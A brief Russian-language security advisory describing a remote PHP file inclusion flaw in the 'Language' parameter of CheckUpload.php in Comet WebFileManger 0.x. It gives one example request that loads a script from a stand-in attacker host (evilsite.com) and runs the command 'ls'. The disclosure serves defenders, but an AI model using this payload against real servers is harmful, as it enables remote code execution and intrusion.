Программа: Comet WebFileManger 0.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "Language" в сценарии CheckUpload.

Пример:

http://[target]/CheckUpload.php?Language=http://evilsite.com/dblib.php/&cmd=ls



Оставить мнение